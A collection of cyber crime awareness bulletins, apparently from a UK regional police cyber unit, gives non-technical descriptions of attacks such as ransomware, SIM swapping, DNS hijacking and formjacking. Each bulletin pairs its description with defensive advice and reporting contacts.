Current News

  • CYBER INTELLIGENCE REPORT

    CYBER INTELLIGENCE REPORT

    Welcome to the 'almost Easter' edition of the Cyber Intelligence Report! Here we'll be taking a look at how Emotet and Trickbot malware were used to spread ransomware, details of an ongoing proactive operation involving South West organisations, and we're holding our first ever South West CiSP meet up. Finally, as always, we share some more general online resources from social media and highlights from the Cyber Information Sharing Partnership (CiSP).

    We'd also be remiss not to mention that cyber attacks often occur over holiday periods to maximise the impact, so be extra careful and stay vigilant!

     

    Current Operation

    • Attention: We're currently working with businesses throughout the South West who may have suffered from a form of ransomware due to having vulnerabilities with their Remote Desktop Protocols (RDP).
    • We are actively contacting businesses as part of this operation. If you do receive a call, you can verify our identity by then calling the non-emergency police number 101, and quoting a collar number which we will supply to you for them to put you through.
    • The RDP Protocol is designed to provide remote access through port 3389. Please consider the below points in relation to RDP:
    • Please ensure that you have strong usernames and passwords, and that your staff are aware of why this is important.
    • Implementing Two-Factor Authentication (especially for Office365) is also strongly recommended.
    • Be aware of who actually has access to RDP within your organisation, and always be suspicious of any spurious activity regarding RDP.

    Remember, if you or your organisation have been a victim of this or any other type of cyber crime, report to Action Fraud, the UK's national cyber crime reporting centre at https://www.actionfraud.police.uk/or via phone on 0300 123 2040

  • NETWORK INTRUSIONS

    Network Intrusion


    A network intrusion is any unauthorised activity on a computer network.

    Network intrusions can be incredibly damaging, and can impact organisations in a number of ways. These can include:

    - Further spreading of malicious software (malware) e.g. ransomware
    - Data breaches
    - Secondary crimes if customers are affected such as fraud
    - Physical and environmental damage if critical national infrastructure is involved

    Attackers use various methods to compromise networks. For example, Phishing emails delivering malware is a very common way for attackers to gain access to networks.

    Accounts with weak passwords and outdated software are also easy ways in for attackers, as shown in one of our investigations involving a South West based retailer. The retailer hadn't patched their Magento ecommerce platform for 6 months, and coupled with an old admin account which had lain dormant for 2 years with a weak password, these vulnerabilities allowed attackers to compromise the company's web payment pages and fraudulently obtain credit card details entered by customers.

    Intrusions can be especially sinister, as an attacker can lay dormant for months or even years gathering information on a company's infrastructure before launching further attacks.

    ADVICE

    Educate and train staff to defend against Phishing attacks
    For advice on how to spot and defend against phishing, see the NCSC's guide on this at https://www.ncsc.gov.uk/phishing

    Use Multi-Factor Authentication (MFA)
    MFA should be a high priority for any and all organisations. MFA is like an additional layer of defence to stop attackers from gaining access to accounts. MFA means that access is only granted after successfully presenting more than one piece of evidence that you are who you say are. These pieces of evidence include one-time codes from authenticator apps, or biometrics.

    MFA is fantastic for defending against Brute Force attacks, where attackers repeatedly trial and error huge numbers of possible passwords.

    Use strong and separate passwords
    Secure your website login account with a strong password, and do not reuse that password across different accounts. A strong password combines random words into a long phrase (e.g. 'ThreeRandomWords') - you can also misspell words or substitute symbols/numbers to strengthen a password (e.g. 'Thre1!Rando3!word5!')

    Ensure that your firewalls are switched on
    Most popular operating systems now include a firewall, so make sure it's switched on.

    Install, enable and update anti-virus/anti-malware
    All devices should have anti-malware/anti-virus software in place that can have, including mobiles/tablets/routers/anything that interacts with your corporate networks.

    Updates and patching
    As a minimum, organisations need to ensure that ALL devices and software are always fully patched. This should extend to third party solutions.

    Principle of Least Privilege
    For Network intrusions this more applies to administrators, but it's good advice that applies to all areas of your business. This principle states that people should only have the absolute minimum access that they need to do their role, and nothing more. If done right, this can prevent or minimise the damage an attacker can do if accounts are compromised or if certain people are socially engineered.

    Reduce your attack surface
    As a rule, if you don't need something, then disable or remove it. The fewer devices/pieces of software/accounts you have, then the fewer vulnerabilities you have.

    For further advice on securing your organisation, check out the recently refurbished NCSC website at https://www.ncsc.gov.uk/

    Reporting
    If you've been affected by this or any other type of cyber crime, report the details to Action Fraud (0300 123 2040 / www.actionfraud.police.uk). Always keep an eye out for any suspicious follow up activity as well.

  • ISLAND HOPPING

    ISLAND HOPPING

    Attackers will look to infiltrate target organisations through smaller companies that work with the target. The term refers to a military tactic where smaller entities are captured and leveraged in order to get to an original target.

    Island Hopping is effectively a Supply Chain attack. Attackers are banking on the assumption that smaller companies will be easier to compromise, and from there they can take advantage of any shared systems and/or the trust between organisations.

     

    ADVICE

    Understand the security risks involved with your supply chain
    Build a picture of who your suppliers are and what their security looks like. Do you know what needs to be protected and why?

    Raise awareness of security with your supply chain
    Communicate your needs to your suppliers, build it into your contracting processes, and meet your own security responsibilities both as a consumer and supplier. For example, the government backed Cyber Essentials scheme can be an indicator that companies have a commitment to cyber security, and have taken steps to guard themselves against the most common cyber threats. Details about the scheme can be found at https://www.cyberessentials.ncsc.gov.uk/

    Seek continuous improvement of security within your supply chain, and build trust with your suppliers

    Educate and train staff to defend against Phishing attacks
    For advice on how to spot and defend against phishing, see the NCSC's guide on this at https://www.ncsc.gov.uk/phishing

    The Take Five campaign is a national campaign encouraging people to stop and think about whether a situation is genuine. Visit the website at
    https://takefive-stopfraud.org.uk/advice/

    Device security
    As a minimum, organisations need to ensure that devices are always fully patched and have anti-malware/anti-virus software in place. This should apply to ALL of your devices, including phones/tablets/printers/routers/internet enabled cameras/IoT devices etc.

    Reporting
    If you've been affected by this or any other type of cyber crime, report the details to Action Fraud (0300 123 2040 / www.actionfraud.police.uk). Always keep an eye out for any suspicious follow up activity as well.

  • A NEW TWIST ON 'SPOOFING'

    A NEW TWIST ON 'SPOOFING'

    Industry: Various
    Attack Methodology: Spoofing a business' identity to conduct cyber attacks
    Apparent Objective: Anonymity for criminal activity

    One complexity of cyber crime is that it isn't clear whether the devices carrying out an attack is doing so at the request of the owner, or whether it has been compromised by a malicious actor.

    In this investigation initially undertaken by the SWRCCU, it was reported that multiple cyber attacks against various companies in the UK and abroad were originating from a computer network associated to a UK company.

    The reality was in fact different. The UK company was not the attacker, but instead a victim of something different.

    What happened?
    Criminals often compromise other computers and use them to carry out attacks, and they even offer access to these computers to other malicious actors. Here, the initial investigation identified victims whereby the attacks had not been conducted by their actual network, but entire IP ranges were registered using their business details such as their name and address. These IP ranges were used to actually carry out the variety of attacks which were being reported.

    This was done by criminal actors with the intent to obscure their identity.

    A closer look
    The actors had set up fake websites posing as the UK victim companies, as well as mail servers which they could use to launch attacks. These fake websites were associated and enquiries were conducted in relation to this association.

    A review of a suspect controlled server was carried out. This provided important lines of enquiry:

    - Thousands of emails, the majority of which were third party companies emailing the attackers to inform them of port scanning and repeated SSH logon attempts made. Essentially, other companies had seen that IP addresses belonging to these companies had been attacking them, and were asking them to stop.

    - A review of emails showed that the controller of the server had used associated accounts to register other IP ranges to conduct attacks, and also to register accounts with Bitcoin exchanges. These Bitcoin exchanges would likely be used to launder money or request ransom demands (most likely from ransomware attacks).

    It was strongly suspected that these IP ranges were being set up with the intention of then selling these to other organised criminal groups to conduct cyber-attacks. The case has since been passed on to other law enforcement agencies to further investigate.

    Points to consider
    From an advice point of view this is a difficult case to offer protective guidance for. It is more important to be aware of how your company can be at risk of being used in attacks, and general criminal infrastructures.

    PR management - One area which companies do not often prepare for is how they will handle security incidents from a PR perspective. This aspect should factor into your incident response plans, and should cover as many eventualities as possible. One of the companies whose details had been used to register IP ranges had directly received enquiries around the malicious activities. Although no public accusations or media coverage had occurred, they decided to pre-empt further enquiries by sending out a message supplied by us on their official website, outlining how the attacks were nothing to do with them.

    Malicious actors are constantly finding new methods to enact cyber crime. It's vital that your organisation is similarly always working to improve your own cyber security.

    User Education and Awareness

    If you ask the majority of cyber security professionals what they consider to be the most important aspect that an organisation needs to focus on to secure themselves, chances are 'User Education and Awareness' will be high on the list of many.

    For many organisations, they may be confused as to what User Education and Awareness should actually cover. Below are some guidelines around how to enable users to keep an organisation secure, whilst also allowing them carry out their day to day activities.

    First of all, we'll take a look at some of the risks of not having sufficient education and awareness policies and procedures in place. Then, we'll outline how those risks can be mitigated.

     

    WHAT ARE THE RISKS?

    Removable media and personally owned devices
    Without clearly defined policies on the use of removable media and personally owned devices, staff may connect devices to corporate networks that might lead to malware infection and/or compromise of sensitive information.

    Legal and regulatory sanction
    If users aren't supported in how they handle particular classes of sensitive information, your organisation may be subject to legal and regulatory sanction.

    Incident reporting culture
    Without an effective reporting culture there will be poor dialogue between users and those responsible for security. This could result in security incidents which could easily have been prevented.

    Security Operating Procedures
    If security operating procedures don't allow to staff to perform their duties, security can be seen as a blocker and possibly ignored entirely. Alternatively, follow procedures too stringently this might damage legitimate business activity.

    External attack
    Since users have legitimate system accesses and rights, they can be a primary focus for external attackers. Attacks such as phishing or social engineering attempts rely on taking advantage of legitimate user capabilities and functions.

    Insider Threat
    Changes over time in an employee's personal situation could make them vulnerable to coercion, and they may release sensitive information to others. Dissatisfied employees may try to abuse their system level privileges or coerce other employees to gain access to information or systems to which they aren't authorised. Equally, they may attempt to physically deface computer resources.

     

    HOW CAN THESE RISKS BE MANAGED?

    Produce a user security policy
    Develop a user security policy, as part of the overarching corporate security policy. Security procedures for all systems should be produced with consideration to different business roles and processes. Policies and procedures should be described in simple business-relevant terms with limited jargon.

    Establish a staff induction process
    New users (including contractors and third party users) should be made aware of their personal responsibility to comply with security policies as part of the induction process. The terms and conditions for their employment/contract should be formally acknowledged and retained to support any subsequent disciplinary action.

    Maintain user awareness of the security risks faced by the organisation
    All users should receive regular refresher training on the security risks to your organisation. Consider providing a platform for users to enquire about security risks and discuss the advice they are given.

    Support the formal assessment of security skills
    Staff in security roles should be encouraged to develop and formally validate their security skills through enrolment on recognised certification schemes. Certain roles such as system administrators/incident management teams may require specialist training.

    Monitor the effectiveness of security training
    Establish mechanisms to test how effective your security training is, and allow users the opportunity to feedback regarding the training to improve its value.

    Promote an incident reporting culture
    Your organisation should be seeking to empower staff to voice their concerns about poor security practices and security incidents to senior staff, without fear of recrimination. Training leaders should also seek to appreciate the effort by non-security staff taking time away from their day-to-day work to help protect the organisation.

  • EMAIL RECORDS EXPOSED ON LINE

    An exposed database belonging to Verifications.io contained both personal and business information, including 763 million unique email addresses.

    Check haveibeenpwned.com to see if you are affected

    For the complete story visit  Wired

    Please get in touch with Blueloop if you need any assistance

  • ANGLER PHISHING

    Angler Phishing

    Criminals create highly convincing customer service accounts on social media, monitor and intercept customer requests, and respond to them with links to fraudulent sites.

    Criminals often have alerts set up to inform them when someone posts about specific companies. They contact customers and usually assure them that the problem will be resolved quickly, and invite them to log in to fake websites designed to steal their credentials/install malware.

    Advice

    For individuals:

    Check that the account responding to you is the official account e.g. check whether account names and handles are what you would expect, and check previous posts/when the account was created.

    Do not click on suspicious links, if in doubt consider using other official channels for support issues e.g. websites/call centers.

    If a page you have been directed to is asking for your details, check for signs that the page is a fake. For example, look closely at the URL for misplaced hyphens/mispellt words/anything out of the ordinary? Does the website use 'HTTPS'? You should also look closely at the language used in the page and the layout. Again, if in doubt search and use the official website independently.

    For businesses:

    Response plan

    Formulate a response plan for handling angler phishing attacks. This could cover:

    Response team
    Identify who would be responsible for handling these incidents, and make sure they know how to deal with them.

    Communication
    Think about how you will communicate with victims about incidents. This needs to be quick and efficient.

    Triage
    Identify steps to protect your customer and your system while you handle the incident e.g. locking the customer's account while you contact them.

    Take down fraud accounts
    Contact service providers (e.g. Twitter) to take down fraudulent accounts and monitor their activity until accounts are closed. You can also consider using a service to help you identify potential lookalike fraud sites which customers may be directed to e.g. https://dnstwister.report/.

    Social Media Support Guidelines
    Clearly state how your team uses social media customer support channels. Cover what you would never ask your customers to do/provide through social media.

    Reporting
    If you've been affected by this or any other type of cyber crime, report the details to Action Fraud (0300 123 2040 / www.actionfraud.police.uk). Always keep an eye out for any suspicious follow up activity as well.

  • VULNERABLE WEBSITE PLUGINS

    Vulnerable Website Plugins


    Plugins are bits of code designed to give extra functions to websites. Like all software, these can have vulnerabilities which criminals can exploit.

    Plugins are a great way to add extra functionality to websites easily as developers/designers don't have to spend time writing absolutely everything themselves. The rise of website builders such as Wordpress/Shopify/Wix has meant that thousands of businesses are often using similar plugins, and so criminals can affect a large number of businesses and their customer bases if a vulnerability is exploited.

    If a website is hacked through vulnerable plugins, criminals can gain access to customer names/email addresses/passwords/other sensitive information.

    Alternatively they could use your website to attack others, making it look as though the attacks are from a legitimate source.

    Managing plugins
    If you are responsible for maintaining your website, then here are a few things to keep in mind when managing plugins:

    - Keep your plugins up to date (some plugins may not be supported and no longer have security updates, consider replacing these)
    - Choose reputable plugins from reputable sources
    - Delete any plugins you're no longer using
    - Use only plugins that you need (consider whether your website really needs certain functionalities - by reducing the number of plugins, you reduce the number of potential vulnerabilities you have)

    If you are not responsible for running your website, make sure to use a reputable hosting provider
    Make sure that whoever is hosting/running your website takes security seriously. Unfortunately, there are constant vulnerabilities being discovered, which means that you need to be confident that your website is receiving security updates. As with any other procurement, do research around a company's track record, and look to see what accreditations they have (e.g. Cyber Essentials/+ can be an indicator that they are aware of security responsibilities).

    Use strong and separate passwords
    Secure your website login account with a strong password, and do not reuse that password across different accounts. A strong password combines random words into a long phrase - you can also misspell words/substitute letters for symbols and numbers to strengthen a password. 

    Turn on two-factor authentication (2FA)
    2FA is an extra layer of protection which double checks that you are who you say you are when logging in to accounts/applications. A 2FA service will send an extra code to the device that you register it to, meaning that unless cyber criminals have access to that device in some way, they won't be able to log in to your account. If possible, use an authenticator app rather than a text based 2FA service, as this is generally more secure and defends against Sim Swapping attacks.

    Reporting
    If you've been affected by this or any other type of cyber crime, report the details to Action Fraud (0300 123 2040 / www.actionfraud.police.uk). Always keep an eye out for any suspicious follow up activity as well.

  • RANSOMWARE ON THE RISE

    RYUK Ransomware

    Ransomware is malicious software that prevents users from accessing their system or files, and demands that a ransom be paid in order to regain access. The RYUK ransomware strain has been around for roughly 5 months now, and has been seen affecting South West organisations.

    Unlike some ransomware strains, RYUK is used for more targeted attacks. Typically, it functions by encrypting crucial assets and resources, with its infection and distribution carried out manually by criminals. This means that a lot of ground work is done by attackers, such as network mapping/hacking and credential collection.

    There have been similarities to the HERMES ransomware strain, which is known to contain code which will identify and delete backup files on a target network.

    RYUK is likely to be delivered via Phishing emails with malicious attachments (e.g. invoices/reports), or through insufficiently protected Remote Desktop Protocol (RDP)configurations.

    ADVICE

    • Back up your data! If you're hit by a ransomware attack, then you can restore from those backups.
    • Whether you're backing up to USB storage devices or separate drives, make sure that your backups are not connected to your internal network, or else they'll be at risk of infection as well.
    • Store your backups off-site as well as on-site, so that in the event of environmental damage (e.g. fires or floods) you'll still have backups to restore from.
    • Cloud storage is a great option which satisfies the above points and is now much more affordable.
    • Educate and train staff to defend against Phishing attacks - see the NCSC's guide on this at https://www.ncsc.gov.uk/phishing. This guidance also includes information for IT staff on configuring email filters effectively, which can counter certain types of BEC.
    • Protect your devices by ensuring that all software is frequently being patched and updated. Ransomware exploits vulnerabilities, so make sure to use the latest versions of any software you have, and apply security patches promptly.
    • Install and run Antivirus software - make sure that it's updated regularly!
    • Ensure that you have firewalls and that they have been correctly configured. If you are not responsible for this, ask your IT manager/provider to confirm this has been done.
    • Remote Desktop Protocol (RDP) allows administrators to connect remotely to computers over a network connection. If you have no need for RDP, consider disabling it. If you are using it, make sure that you:
    1. Employ strong/unique passwords (consider using the 'ThreeRandomWords' technique
    2. Review port security (e.g. consider reassigning default ports/disable unused ports)
    3. Use a VPN and Two-Factor Authentication for remote working
    4. Make use of monitoring tools on RDP


    If you suffer a ransomware attack, do NOT pay the ransom. If you do pay, there is no guarantee that you will receive your data back. If anything, paying out means that you're likely to be targeted again. Report the crime to ActionFraud via phone 0300 123 2040 or website (https://www.actionfraud.police.uk).

  • DNS HIJACKING

    DNS Hijacking

    An attack where criminals redirect users to undesired/malicious websites, usually by compromising devices or servers and changing settings.

    The Domain Name System (DNS)is essentially an internet phonebook, which allows domains (groups of devices) to locate and talk to each other so they can access resources such as web pages Locating domains correctly is quite a convoluted process involving a lot of entities.

    In a stripped down scenario, when you type in a domain name/URL (e.g. 'www.google.com' for the website hosted by Google), your browser will ask your internet service provider where that domain is located. Your service provider doesn't have this information, so it asks other organisations who are responsible for domain records such as registrars/registries. These organisations will eventually locate the desired domain, and that domain will verify that it is in fact the correct one (i.e. "Yes that website is hosted here and belongs to us, here it is!").

    [Note: In this process, domain names are translated to numeric labels called 'IP addresses' - because computers prefer working with numbers!]

    If there's a compromise anywhere in this chain then that can be a real problem. Modified DNS settings can redirect a visitor to a malicious website belonging to an attacker. The visitor likely won't be aware that this has happened as they type the same URL in as usual, it just gets redirected in the background. The fake website could be designed to steal sensitive information or get someone to download malware.

    ADVICE

    There are a few different DNS hijacking methods to be aware of. These are discussed below, along with advice on how to protect yourself against these methods.

    Method #1

    Criminals will seek to install malware on your device which modifies the DNS settings on your computer/router. This will silently point you to rogue websites. To counter this, make sure that you:

    1. Install security patches and updates as they're released.
    2. Install and frequently update antivirus and anti-malware software.
    3. Avoid clicking on suspicious links in unsolicited emails/texts/social media messages.
    4. Don't download dodgy/untrusted applications.

    Method #2

    Criminals will hack into your router and change the DNS settings:

    One way you can protect your router from being compromised is to make sure you change the default admin username and password for the device. Default factory logins are available readily online, so this is an easy way in for hackers if login info is left unchanged.

    Method #3

    As discussed in the Threat section, your internet service provider or external agency may have become compromised. If this has happened, unfortunately there isn't a whole lot you can do. However, bear in mind the following points:

    1. Be very cautious and suspicious when a site that you visit regularly is behaving strangely (e.g. new pop-ups and unusual calls to action).
    2. Review your Business Continuity and Incident Response plans, and think about how incidents such as these are factored into your plans.

    Method #4

    It's also possible that a criminal will connect to public Wi-Fi networks and masquerade as a legitimate hotspot so that they can eavesdrop on your web traffic. To defend against this, avoid using public Wi-Fi to conduct any sensitive business which requires login information. As a rule, if the Wi-Fi doesn't have a landing page discussing terms of service or similar, be suspicious.

    Every Report Matters – if you have been a victim of fraud or cyber crime, report it to Action Fraud (either online at https://www.actionfraud.police.uk/ or call 0300 123 2040).

  • DENIAL OF SERVICE DOS

    Denial of Service (DoS) attacks

    A class of attacks which are designed to render a service inaccessible to users.

    You may have heard about or even experienced DoS attacks that have been launched against websites, however this type of attack can be launched against any system e.g. industrial control systems which support critical processes. 

    A basic technical description is that an attacker will overload a server (a computer that 'serves' many types of information to other computers) with illegitimate requests for information. This then makes it impossible for that server to deal with the requests from legitimate users, and prevents devices which depend on that network from exchanging information.

    DoS attacks can range in duration and may target more than one website or service at a time. An attack becomes a Distributed Denial of Service (DDoS) attack when it comes from multiple compromised devices at once. Multiple compromised devices used for this purpose is often referred to as a botnet. It's important that you secure your devices (frequent updates/not clicking on suspicious links or attachments/utilising anti-virus etc.) so that they aren't used in this way. DDoS attacks are highly prevalent due to the increasing number of connected devices.

    Motivations for DoS attacks can be more varied than other type of attacks. As the effect is quite often immediately public, this is a favoured method of political activists/'hacktivists', or even disgruntled former employees looking to cause both PR and financial damages. Of course, criminals can employ DoS attacks for financial gain, either through ransom demands, or if they are operating a DoS service for hire.

    ADVICE

    Although there is technical advice which can help defend against DoS attacks, the majority of this may not be applicable to all, and not suitable to include in this format. More detailed guidance on DoS attacks can be found on the National Cyber Security Centre (NCSC) website outlined in the 'Useful Links' section below. However, we have included some brief points to consider below:

    • Prepare - ensure that you and your service providers are prepared to deal with an overload of their resources. Ask them to explain how they are prepared for these scenarios, and how they can mitigate the threat for your organisation.
    • Incident Response - understand what impact a DoS attack would have on your business and create an incident response plan. Think about who needs to be involved both internally and externally (e.g. 3rd party providers), and clearly define the roles and responsibilities for each. Think about having manual backup processes to rely on which can operate whilst the main services are down. Be thorough, and test your plan!
    • DoS attacks can be used as a smokescreen to distract from other attacks which have a different aim (e.g. data theft). Be aware of this, and monitor closely for other suspicious activity which could indicate additional attacks.
    • Action Fraud - if you are experiencing a live cyber attack, you can contact Action Fraud via telephone on 0300 123 2040, and follow the instructions. If it has been dealt with, then please also report the crime to Action Fraud, as every report will help law enforcement with intelligence building.

    USEFUL LINKS

    DoS guidance collection from NCSC
    Guidance to help  organisations understand and mitigate against DoS attacks  (from the NCSC at https://www.ncsc.gov.uk/guidance/denial-service-dos-guidance-collection).

    Connected Devices
    Lucky enough to get a new device for Christmas? Learn how to protect yourself, your family, finances, and connected devices with these tips (from Get Safe Online at https://www.getsafeonline.org/connectedchristmas/).

  • REMOTE ACCESS TROJAN (RAT)

    Remote Access Trojan (RAT)

    A tool used to enable criminals to connect to a victim's machine remotely and perform a number of unauthorised actions.

    A RAT will allow hackers access to all files, features of your computer (Microphone/Webcam), and even use your computer to distribute malware to other machines.

    ADVICE

    Signs of a RAT on your system include a slow internet connection, unknown processes running on your systems, and files that have been modified/deleted/installed without permission. Here is some advice to protect against this type of attack:

    • Make sure that your operating systems on your computer, mobile & tablet are updated with the latest security patches.
    • Update your software with the latest security patches (e.g. Microsoft Office, Java, Flash, web browsers).
    • Install reliable antivirus and firewall programs, and keep these updated.
    • Don't click on any unusual links or attachments from emails, websites or social media.
    • Only download apps from sources that you trust.
    • Regularly back up your data.

    If you know or suspect you have been infected with a RAT, here's what to do:

    • Install security software from a trusted and reliable source.
    • Run a full security scan of your device and remove the threats by following the recommended steps from the security software.
    • Once you think that the infection has been removed, change the passwords for your online accounts and check your banking activity.
    • Report anything unusual to your bank and, as needed, to Action Fraud (0300 123 2040 / www.actionfraud.police.uk).
    • Learn how to protect your computer from future infections and avoid data loss by following the steps outlined above, and from handouts such as the NCSC's 'Small Business Guide').
  • SEASON SCAMS

    Seasonal Scams

    This time of the year is a gold mine for cyber criminals, as shoppers are rushing to bag bargains, and employees are already mentally clocking out for the holidays.seasonscams

    Fake websites and phishing emails promising truly unbelievable offers are rampant.

    So with this in mind, we've highlighted 7 tips below to keep you safe in the run up to Christmas and beyond!

    Stay up to date
    Installing the latest software and app updates is an essential part of protecting yourself. Updates aren't just for exciting new features, they usually contain really important security updates which can protect you against a number of attacks. Turn on automatic updates where you can!

    Use strong and separate passwords
    Secure your important accounts with a strong password, and do not reuse passwords across accounts. A huge number of the businesses in our investigations have suffered because of weak passwords, and this. Do not use personal information in passwords. Instead, use a combination of random words, substituting certain letters for numbers/symbols.

    Turn on two-factor authentication (2FA), now!
    2FA is an extra layer of protection which double checks that you are who you say you are when logging in to accounts/applications. A 2FA service will send an extra code to the device that you register it to, meaning that unless cyber criminals have access to that device in some way, they won't be able to log in to your account. If possible, use an authenticator app rather than a text based 2FA service, as this is generally more secure and defends against Sim Swapping attacks.

    Use a password manager
    Having separate passwords is important, but it can be difficult to remember them all. You could consider using a password manager to get rid of this problem. Be aware that if you do use a password manager, you should make sure that your master password is incredibly secure (see the above rules for creating a good password).

    Take extra care over links in emails and texts
    Always be wary of suspicious links, in fact try to get out of the habit of following them if you can. For example, if an email is referencing your account in any way and asks you to follow a link to do something, then go and log into your account separately (i.e. not using that link) to check activity there. Same goes for information on deals/coupons/vouchers, you should always look through other channels to verify information. Links could lead to fake websites designed to steal your information or money, and attachments could be malicious files.

    Only shop on sites that you trust, and report phishing emails to Action Fraud or hit the Spam or Report button within your email account.

    Don't give away too much information
    Normally online stores will ask for some information e.g. address, and some bank information to complete a purchase. If a store is asking for personal information which shouldn't be needed such as where you went to school, or your mother's maiden name, then this could be a red flag that a purchase is not legitimate.

    Also, if you can avoid it, don't create an account unless you plan to use a site in the future. You can usually checkout as a guest.

    When things don't feel right
    If something doesn't add up, then take five and take a second look at what you're being asked to give/do. If you're concerned that you may be at risk of cyber crime, then immediately close down your internet browser. Report the details to Action Fraud (0300 123 2040 / www.actionfraud.police.uk) and contact your bank to seek advice. Whether you've been a victim of fraud will depend on how much information you've provided to the website. Keep an eye out for fraudulent activity on your accounts, and for any suspicious follow up activity through emails/texts/phone calls etc.

  • PHONE SCAM

    Phone Scam

    We have had a report that criminals are using our name in a phone scam. The report is that criminals are pretending to be from the South West Regional Cyber Crime Unit, and calling people using an automated message that says their internet has been compromised and will be shut down within 24 hours, and if they want to speak to the technical team they should 'press 1'.

    This is a scam, if you do receive a call like this, hang up the phone immediately.

    The South West Regional Cyber Crime Unit do not operate an automated call service. If we do contact you, we will provide you with a way of verifying that it is us, such as a collar number which you can then give to a 101 call handler if you need to confirm the caller's identity.

    If you are concerned that you have been a victim of this or any other type of cyber crime, report to Action Fraud on 0300 123 2040, or online at https://www.actionfraud.police.uk/

    For advice on protecting yourself against this type of scam, visit the Take Five campaign website at https://takefive-stopfraud.org.uk/advice/

  • BUSINESS EMAIL COMPROMISE (BEC)

    Business Email Compromise (BEC)

    A targeted form of phishing where criminals impersonate senior executives, or departmental authority figures, in order to get others to transfer funds or sensitive information to the imposter.

    BEC can happen in different ways, but generally speaking a criminal will either hack into an executives email account, or they will 'spoof' the account (i.e. email from a lookalike account which is very similar to the original account). If an email has been spoofed then email filters may be able to help prevent these from reaching employees.

    If an account has been hacked, then this is much harder to combat, as requests are coming from a legitimate account so detection software won't be much help. This type of BEC allows a criminal the opportunity to directly alter invoice attachments, and even set up rules which will redirect emails into folders to cover up their tracks.

  • SIM SWAPPING

    SIM SWAPPING

    Criminals will pose as an account holder and request a new SIM card. Once received, this allows them to effectively take control of the victim's phone. They can then access accounts which use passcodes sent to the victim's phone such as in SMS/call based two-factor authentication.

    Attackers will initially use other compromised information to bypass a company's security checks and request the new SIM. This information may be gained from leaked information on the dark web, phishing emails, or malicious software installed on user devices.

    ADVICE

    Be on the lookout for warning signs. Suddenly losing all service could indicate that a criminal has transferred your phone number to a different device. Receiving random authentication codes could also be a sign that someone is trying to breach your online accounts. Contact your phone company and financial institutions to mitigate any potential damage if you suspect any of the above.

    SMS based two-factor authentication is better than nothing, however it is better to use an authenticator app instead (e.g. Google/Authy). Using these apps will protect accounts against SIM swap attacks.

    As mentioned, criminals may use other personal information to bypass security checks. Make sure that you are not exposing this sort of information on any of your online profiles. This information could be your phone number itself, or information such as your address / education / mother's maiden name / banking information etc.

    Many phone companies will allow you to put a unique PIN on your account.Enable this for another layer of security.

    Similarly, make sure that your bank accounts have as many security procedures enabled as possible. For example, in one of these cases, Voice ID prevented a criminal from draining a victim's bank account.

    Make sure that you know how to defend against Phishing attacks looking to compromise personal information used to bypass security checks - see the NCSC's guide on this at https://www.ncsc.gov.uk/phishing

    Following on from the above point, don't download potentially malicious apps from untrusted sources, these could also steal your personal information to enable SIM swapping.

    Many accounts ask you to link your phone number to them. One alternative is to obtain and use a VoIP number (Voice over Internet Protocol), if possible. Since VoIP numbers operate over the internet, they are immune to being SIM swapped.

    If you are a victim of SIM Swapping, report it to Action Fraud https://www.actionfraud.police.uk/.

  • Credential Stuffing

    Criminals will automatically enter lists of compromised password/username pairs in order to gain unauthorised access to accounts.

    Once an account is taken over, an attacker can drain the account of any value it has, steal any associated personal information linked to the account, and use any of that information for further malicious purposes (e.g. sending spam emails).

    ADVICE

    Use separate passwords for all of your different accounts. This reduces the likelihood that passwords that have been compromised for one account can be used to gain access to other accounts. Avoid using your corporate network credentials for third-party sites.

    Create strong passwords e.g. do NOT use personally linked information such as your pet's name, use the 'ThreeRandomWords' technique.

    If you think that your password may have been compromised, make sure to change it. Consider using resources such as 'haveibeenpwned.com' to check whether your passwords have been exposed in a data breach.

    Enable Two-factor/Multi-factor authentication on your accounts where possible. Do this, and it will make it much harder for criminals to gain access to your accounts.

  • Morrisons Appeal

    Morrisons loses appeal against data breach liability ruling

    The supermarket chain has lost its appeal against a High Court ruling that found it liable for a data leak by a former employee, underlining the importance of managing insider threats.

    The Court of Appeal ruled that Morrisons must pay compensation to 100,000 employees who were victims of the data breach by disgruntled employee Andrew Skelton, a senior internal auditor at the supermarket’s headquarters who deliberately leaked payroll information. The Appeal Court’s ruling underlines the fact that organisations are ultimately responsible for the personal data they hold.

    Morrisons is to appeal to the Supreme Court.

  • FORMJACKING

    Criminals will inject malicious code into a legitimate web page to steal a user's data. Typically this technique is used on check-out or payment forms on e-commerce sites.

    This type of attack has been employed in the recent Ticketmaster and BA data breaches, but these are only a couple of examples of high profile incidents, it's very likely that there are a huge number of websites which may currently be at risk.

    Formjacking can be difficult to detect for both user and vendor. Web pages will look and function the same to the user, and the information entered into a form is still sent through to the vendor. It's only in the background that the attacker is copying the data.

    FOR USERS

    Training and Awareness - in some cases, formjacking requires a user to click on a malicious link or visit a malicious website which will prompt them to fill in sensitive data. It's important that you and your colleagues can recognise when attackers are employing this tactic. Make sure to check that the URLs of websites in the address bar are what they should be (e.g. look for misspellings, numbers instead of letters, irregular domain endings).

    Ensure that your firewalls have been correctly configured, so that known suspicious websites are not accessible. If you are not responsible for this, ask your IT manager/provider to confirm this has been done.

    Where a legitimate website is compromised, it can be very difficult to protect against. Formjacking can be a type of Supply Chain Attack, in that criminals can target companies through the web services that they use. This should serve as a reminder to always do your due diligence when deciding which online services you use, and how you use them. Think about what security measures they have in place e.g. are they Cyber Essentials certified? How would they notify/work with you in the event of a cyber incident?

    FOR DEVELOPERS / IT ADMINS

    Always integrate security into the development process. Scan internal codebases at different stages of the development cycle for anomalies.

    Access Controls - ensure that only employees who need to have the ability to edit important source code can do so.

    Strong Content Security Policies - control which domains are allowed to communicate with your website, and how. If done correctly, CSPs can prevent malicious code from sending compromised data to other servers.

    Check CiSP! - the Cyber Security Information Sharing Partnership is regularly updated with example code and other Indicators of Compromise (IOCs) to help identify these types of threats.

  • LEAKS

    It’s a common theme in the news ‘Company X has had a security breach and Y customer details have been leaked’

    But what does this actually mean?

    Cyber Crime is big business and it is believed that through 2017 Cyber Crime may have cost the world around $600 billion. For many of these criminals it is their day job and your data are their pay cheques.

    Among many other methods to obtain money, one tactic is for an attacker to infiltrate a business computer network and find personal data stored on their systems. This could be names, email addresses, credit card numbers and details, passwords etc. This information is then uploaded to marketplaces on the Dark Web for other people to buy.


    Taken from Experian, below is an estimate on how much your data can be purchased for on the Dark Web:

    leaks

    People purchasing this information can buy specific pieces of information such as a person’s passport details or bulk data with various categories from many different sources.

    Other attackers can then use this information to create further attacks, for example someone could find your full name and a password that was used on a breached website. They could then check online for other accounts under the same person’s name, eg Facebook, Linkedin, on-line banking etc. and then try the leaked password on these sites.

    How many of us use the same password for multiple site logins?

